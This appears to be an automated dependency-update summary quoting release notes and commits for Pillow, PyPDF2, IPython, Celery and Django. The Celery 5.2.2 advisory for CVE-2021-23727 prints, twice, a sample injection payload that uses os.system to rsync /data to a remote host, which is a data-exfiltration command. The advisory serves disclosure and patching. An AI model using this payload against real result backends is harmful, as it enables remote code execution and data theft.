Sourced from pillow's releases.

9.3.0

https://pillow.readthedocs.io/en/stable/releasenotes/9.3.0.html

Changes

• Initialize libtiff buffer when saving #6699 [@​radarhere]
• Limit SAMPLESPERPIXEL to avoid runtime DOS #6700 [@​wiredfool]
• Inline fname2char to fix memory leak #6329 [@​nulano]
• Fix memory leaks related to text features #6330 [@​nulano]
• Use double quotes for version check on old CPython on Windows #6695 [@​hugovk]
• GHA: replace deprecated set-output command with GITHUB_OUTPUT file #6697 [@​nulano]
• Remove backup implementation of Round for Windows platforms #6693 [@​cgohlke]
• Upload fribidi.dll to GitHub Actions #6532 [@​nulano]
• Fixed set_variation_by_name offset #6445 [@​radarhere]
• Windows build improvements #6562 [@​nulano]
• Fix malloc in _imagingft.c:font_setvaraxes #6690 [@​cgohlke]
• Only use ASCII characters in C source file #6691 [@​cgohlke]
• Release Python GIL when converting images using matrix operations #6418 [@​hmaarrfk]
• Added ExifTags enums #6630 [@​radarhere]
• Do not modify previous frame when calculating delta in PNG #6683 [@​radarhere]
• Added support for reading BMP images with RLE4 compression #6674 [@​npjg]
• Decode JPEG compressed BLP1 data in original mode #6678 [@​radarhere]
• pylint warnings #6659 [@​marksmayo]
• Added GPS TIFF tag info #6661 [@​radarhere]
• Added conversion between RGB/RGBA/RGBX and LAB #6647 [@​radarhere]
• Do not attempt normalization if mode is already normal #6644 [@​radarhere]
• Fixed seeking to an L frame in a GIF #6576 [@​radarhere]
• Consider all frames when selecting mode for PNG save_all #6610 [@​radarhere]
• Don't reassign crc on ChunkStream close #6627 [@​radarhere]
• Raise a warning if NumPy failed to raise an error during conversion #6594 [@​radarhere]
• Only read a maximum of 100 bytes at a time in IMT header #6623 [@​radarhere]
• Show all frames in ImageShow #6611 [@​radarhere]
• Allow FLI palette chunk to not be first #6626 [@​radarhere]
• If first GIF frame has transparency for RGB_ALWAYS loading strategy, use RGBA mode #6592 [@​radarhere]
• Round box position to integer when pasting embedded color #6517 [@​radarhere]
• Removed EXIF prefix when saving WebP #6582 [@​radarhere]
• Pad IM palette to 768 bytes when saving #6579 [@​radarhere]
• Added DDS BC6H reading #6449 [@​ShadelessFox]
• Added support for opening WhiteIsZero 16-bit integer TIFF images #6642 [@​JayWiz]
• Raise an error when allocating translucent color to RGB palette #6654 [@​jsbueno]
• Moved mode check outside of loops #6650 [@​radarhere]
• Added reading of TIFF child images #6569 [@​radarhere]
• Improved ImageOps palette handling #6596 [@​PososikTeam]
• Defer parsing of palette into colors #6567 [@​radarhere]
• Apply transparency to P images in ImageTk.PhotoImage #6559 [@​radarhere]
• Use rounding in ImageOps contain() and pad() #6522 [@​bibinhashley]
• Fixed GIF remapping to palette with duplicate entries #6548 [@​radarhere]
• Allow remap_palette() to return an image with less than 256 palette entries #6543 [@​radarhere]
• Corrected BMP and TGA palette size when saving #6500 [@​radarhere]

... (truncated)

Sourced from pillow's changelog.

9.3.0 (2022-10-29)

• Limit SAMPLESPERPIXEL to avoid runtime DOS #6700 [wiredfool]

• Initialize libtiff buffer when saving #6699 [radarhere]

• Inline fname2char to fix memory leak #6329 [nulano]

• Fix memory leaks related to text features #6330 [nulano]

• Use double quotes for version check on old CPython on Windows #6695 [hugovk]

• Remove backup implementation of Round for Windows platforms #6693 [cgohlke]

• Fixed set_variation_by_name offset #6445 [radarhere]

• Fix malloc in _imagingft.c:font_setvaraxes #6690 [cgohlke]

• Release Python GIL when converting images using matrix operations #6418 [hmaarrfk]

• Added ExifTags enums #6630 [radarhere]

• Do not modify previous frame when calculating delta in PNG #6683 [radarhere]

• Added support for reading BMP images with RLE4 compression #6674 [npjg, radarhere]

• Decode JPEG compressed BLP1 data in original mode #6678 [radarhere]

• Added GPS TIFF tag info #6661 [radarhere]

• Added conversion between RGB/RGBA/RGBX and LAB #6647 [radarhere]

• Do not attempt normalization if mode is already normal #6644 [radarhere]

... (truncated)

• d594f4c Update CHANGES.rst [ci skip]
• 909dc64 9.3.0 version bump
• 1a51ce7 Merge pull request #6699 from hugovk/security-libtiff_buffer
• 2444cdd Merge pull request #6700 from hugovk/security-samples_per_pixel-sec
• 744f455 Added release notes
• 0846bfa Add to release notes
• 799a6a0 Fix linting
• 00b25fd Hide UserWarning in logs
• 05b175e Tighter test case
• 13f2c5a Prevent DOS with large SAMPLESPERPIXEL in Tiff IFD
• Additional commits viewable in compare view

Sourced from pypdf2's releases.

Version 1.27.5, 2022-04-15

Security (SEC)

• ContentStream_readInlineImage had potential infinite loop (#740)

Bug fixes (BUG)

• Fix merging encrypted files (#757)
• CCITTFaxDecode decodeParms can be an ArrayObject (#756)

Robustness improvements (ROBUST)

• title sometimes None (#744)

Documentation (DOC)

• Adjust short description of the package

Tests and Test setup (TST)

• Rewrite JS tests from unittest to pytest (#746)
• Increase Test coverage, mainly with filters (#756)
• Add test for inline images (#758)

Developer Experience Improvements (DEV)

• Remove unused Travis-CI configuration (#747)
• Show code coverage (#754, #755)
• Add mutmut (#760)

Miscellaneous

• STY: Closing file handles, explicit exports, ... (#743)

All changes: https://github.com/py-pdf/PyPDF2/compare/1.27.4...1.27.5

Version 1.27.0

Features

• Add alpha channel support for png files in Script (#614)

Bug fixes (BUG)

• Fix formatWarning for filename without slash (#612)
• Add whitespace between words for extractText() (#569, #334)
• "invalid escape sequence" SyntaxError (#522)
• Avoid error when printing warning in pythonw (#486)
• Stream operations can be List or Dict (#665)

Documentation (DOC)

... (truncated)

Sourced from pypdf2's changelog.

Version 1.27.5, 2022-04-15

Security (SEC):

• ContentStream_readInlineImage had potential infinite loop (#740)

Bug fixes (BUG):

• Fix merging encrypted files (#757)
• CCITTFaxDecode decodeParms can be an ArrayObject (#756)

Robustness improvements (ROBUST):

• title sometimes None (#744)

Documentation (DOC):

• Adjust short description of the package

Tests and Test setup (TST):

• Rewrite JS tests from unittest to pytest (#746)
• Increase Test coverage, mainly with filters (#756)
• Add test for inline images (#758)

Developer Experience Improvements (DEV):

• Remove unused Travis-CI configuration (#747)
• Show code coverage (#754, #755)
• Add mutmut (#760)

Miscellaneous:

• STY: Closing file handles, explicit exports, ... (#743)

All changes: https://github.com/py-pdf/PyPDF2/compare/1.27.4...1.27.5

Version 1.27.4, 2022-04-12

Bug fixes (BUG):

• Guard formatting of init.doc string (#738)

Packaging (PKG):

• Add more precise license field to setup (#733)

... (truncated)

• 733989a REL: 1.27.5
• 8aa440c DEV: Add mutmut (#760)
• eda50ac TST: Check for metadata
• d71fb3e SEC/PERF: ContentStream_readInlineImage (#740)
• 0890b06 TST: Add test for inline images (#758)
• 29194cd ROBUST: title sometimes None (#744)
• 012709f TST: Increase Test coverage (#756)
• 9d53ee8 BUG: Fix merging encrypted files (#757)
• fe45d2e Combine coverage (#755)
• 01a1242 DEV: Show code coverage (#754)
• Additional commits viewable in compare view

• d43c7c7 release 7.16.3
• 5fa1e40 Merge pull request from GHSA-pq7m-3gw7-gq5x
• 8df8971 back to dev
• 9f477b7 release 7.16.2
• 138f266 bring back release helper from master branch
• 5aa3634 Merge pull request #13341 from meeseeksmachine/auto-backport-of-pr-13335-on-7...
• bcae8e0 Backport PR #13335: What's new 7.16.2
• 8fcdcd3 Pin Jedi to <0.17.2.
• 2486838 release 7.16.1
• 20bdc6f fix conda build
• Additional commits viewable in compare view

Sourced from celery's releases.

5.2.2

Release date: 2021-12-26 16:30 P.M UTC+2:00

Release by: Omer Katz

• Various documentation fixes.

• Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

  When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }
  

  According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

v5.2.1

Release date: 2021-11-16 8.55 P.M UTC+6:00

Release by: Asif Saif Uddin

• Fix rstrip usage on bytes instance in ProxyLogger.
• Pass logfile to ExecStop in celery.service example systemd file.
• fix: reduce latency of AsyncResult.get under gevent (#7052)
• Limit redis version: <4.0.0.
• Bump min kombu version to 5.2.2.
• Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

... (truncated)

Sourced from celery's changelog.

5.2.2

:release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

• Various documentation fixes.

• Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

  When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

  .. code-block:: python

    {
          "exc_module": "os",
          'exc_type': "system",
          "exc_message": "rsync /data [email protected]:~/data"
    }
  

  According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

.. _version-5.2.1:

5.2.1

:release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

• Fix rstrip usage on bytes instance in ProxyLogger.
• Pass logfile to ExecStop in celery.service example systemd file.
• fix: reduce latency of AsyncResult.get under gevent (#7052)
• Limit redis version: <4.0.0.
• Bump min kombu version to 5.2.2.

... (truncated)

• b21c13d Bump version: 5.2.1 → 5.2.2
• a60b486 Add changelog for 5.2.2.
• 3e5d630 Fix changelog formatting.
• 1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
• 2d8dbc2 Update configuration.rst
• 9596aba Fix typo in documentation
• 639ad83 update doc to reflect Celery 5.2.x (#7153)
• d32356c Bump version: 5.2.0 → 5.2.1
• 6842a78 Merge branch 'master' of https://github.com/celery/celery
• 4c92cb7 changelog for v5.2.1
• Additional commits viewable in compare view

• 2da029d [2.2.x] Bumped version for 2.2.24 release.
• f27c38a [2.2.x] Fixed CVE-2021-33571 -- Prevented leading zeros in IPv4 addresses.
• 053cc95 [2.2.x] Fixed CVE-2021-33203 -- Fixed potential path-traversal via admindocs'...
• 6229d87 [2.2.x] Confirmed release date for Django 2.2.24.
• f163ad5 [2.2.x] Added stub release notes and date for Django 2.2.24.
• bed1755 [2.2.x] Changed IRC references to Libera.Chat.
• 63f0d7a [2.2.x] Refs #32718 -- Fixed file_storage.test_generate_filename and model_fi...
• 5fe4970 [2.2.x] Post-release version bump.
• 61f814f [2.2.x] Bumped version for 2.2.23 release.
• b8ecb06 [2.2.x] Fixed #32718 -- Relaxed file name validation in FileField.
• Additional commits viewable in compare view